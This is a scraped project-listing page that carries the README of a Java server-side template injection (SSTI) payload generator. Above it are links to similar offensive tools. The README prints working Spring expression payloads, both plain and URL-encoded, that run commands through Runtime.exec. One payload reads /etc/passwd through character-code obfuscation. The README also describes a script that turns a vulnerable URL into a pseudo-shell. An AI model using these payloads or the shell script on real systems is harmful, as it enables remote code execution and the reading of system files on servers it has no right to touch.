Cheap and reliable Node.js hosting starts at $3/month, and $1/month static HTML hosting

Payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy . Brutal is a toolkit to quickly create various payload,powershell attack , virus attack and launch listener for a Human Interface Device ( Payload Teensy )

Stars: ✭ 678 (+2507.69%)

Mutual labels: payload

Briefing

Secure direct video group chat

Stars: ✭ 710 (+2630.77%)

Mutual labels: webapp

Msfpc

MSFvenom Payload Creator (MSFPC)

Stars: ✭ 808 (+3007.69%)

Mutual labels: payload

Zhihudaily Vue

知乎日报web版---vue

Stars: ✭ 654 (+2415.38%)

Mutual labels: webapp

Symptoms Tracker

A scalable web app for tracking covid-19-related symptoms amongst confined populations

Stars: ✭ 18 (-30.77%)

Mutual labels: webapp

App Framework

Applications for any device with HTML, CSS and JavaScript - free and open source!

Stars: ✭ 639 (+2357.69%)

Mutual labels: webapp

Pupy

Pupy is an opensource, cross-platform (Windows, Linux, OSX, Android) remote administration and post-exploitation tool mainly written in python

Stars: ✭ 6,737 (+25811.54%)

Mutual labels: payload

Mean Angular5 Passport Authentication

Securing MEAN Stack (Angular 5) Web Application using Passport Authentication

Stars: ✭ 24 (-7.69%)

Mutual labels: webapp

Diaspora Native Webapp

Native Android Client for the Diaspora Social Network

Stars: ✭ 18 (-30.77%)

Mutual labels: webapp

Nem Apps Lib

Semantic Java API Library for NEM Platform

Stars: ✭ 16 (-38.46%)

Mutual labels: payload

View All Similar Projects ➔

SSTI Payload Generator

This generator is for a specific type of Java SSTI, inspired by the following PayloadAllTheThings:

${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())}

The string is converted into a decimal value and then concatenated together. This python script will automate that process within a interactive Cmd prompt.

Example 1:

> python3 ssti-payload.py
Command ==> whoami
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(119).concat(T(java.lang.Character).toString(104)).concat(T(java.lang.Character).toString(111)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(105))).getInputStream())}

Command ==> id
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(105).concat(T(java.lang.Character).toString(100))).getInputStream())}

Command ==> uname -a
${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(117).concat(T(java.lang.Character).toString(110)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(109)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(45)).concat(T(java.lang.Character).toString(97))).getInputStream())}

Example 2 (url encoded):

> python3 ssti-payload.py -u
Command ==> whoami
%24%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28119%29.concat%28T%28java.lang.Character%29.toString%28104%29%29.concat%28T%28java.lang.Character%29.toString%28111%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28109%29%29.concat%28T%28java.lang.Character%29.toString%28105%29%29%29.getInputStream%28%29%29%7D

Command ==> id
%24%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28105%29.concat%28T%28java.lang.Character%29.toString%28100%29%29%29.getInputStream%28%29%29%7D

Command ==> uname -a
%24%7BT%28org.apache.commons.io.IOUtils%29.toString%28T%28java.lang.Runtime%29.getRuntime%28%29.exec%28T%28java.lang.Character%29.toString%28117%29.concat%28T%28java.lang.Character%29.toString%28110%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29.concat%28T%28java.lang.Character%29.toString%28109%29%29.concat%28T%28java.lang.Character%29.toString%28101%29%29.concat%28T%28java.lang.Character%29.toString%2832%29%29.concat%28T%28java.lang.Character%29.toString%2845%29%29.concat%28T%28java.lang.Character%29.toString%2897%29%29%29.getInputStream%28%29%29%7D

SSTI Skeleton

ssti-skel.py uses the Cmd library to create a looped command prompt. This directly takes input from the command line, encodes it appropriately, and sends it via requests to the target url (-t).

If successful, the script will be a pseudo-shell, allowing for commands to be sent in real time. If at anytime a request fails, the script will quit.

This is a very specific usecase. But if it works, it works.

Example command:

python3 ssti-skel.py -t 'https://example.com/path?param='

Depending on the response, the ssti=str(output).split(''')[1].rstrip() variable will probably have to be changed to suit the response. No clever logic was implemented for this :)

Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].

Stars: ✭ 26

Visit Git Page 🔗Visit User Page 🔗Visit Issues Page (0) 🔗